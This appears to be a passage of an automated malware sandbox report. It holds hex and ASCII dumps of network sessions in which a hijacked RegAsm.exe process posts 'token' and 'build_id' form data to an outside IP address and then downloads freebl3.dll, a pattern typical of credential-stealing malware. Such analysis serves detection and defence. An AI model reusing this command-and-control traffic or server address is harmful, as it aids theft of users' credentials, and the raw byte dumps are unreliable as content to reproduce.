                                                                                                                                                                                                          Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                          2024-04-10 06:56:24 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                          Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                          2024-04-10 06:56:25 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                          Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                          2024-04-10 06:56:25 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                          Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                          2024-04-10 06:56:25 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                          Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                          2024-04-10 06:56:25 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                          Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                          2024-04-10 06:56:25 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.44975495.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:26 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 4677
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:26 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------AEHIDAKECFIEBGDHJEBKCont
                                                                                                                                                                                                          2024-04-10 06:56:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:27 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          15192.168.2.44975595.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:27 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 1529
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:27 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------KEBGHCBAEGDHIDGCBAECCont
                                                                                                                                                                                                          2024-04-10 06:56:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:28 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          16192.168.2.44975695.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:28 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:28 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DGIJEGHDAECAKECAFCAKCont
                                                                                                                                                                                                          2024-04-10 06:56:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:29 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          17192.168.2.44975795.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:29 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:29 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BKEBFHIJECFIDGDGCGHCCont
                                                                                                                                                                                                          2024-04-10 06:56:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:30 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          18192.168.2.44975895.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:30 UTC221OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:31 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-a7550"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                          Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                          Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                          Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                          Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
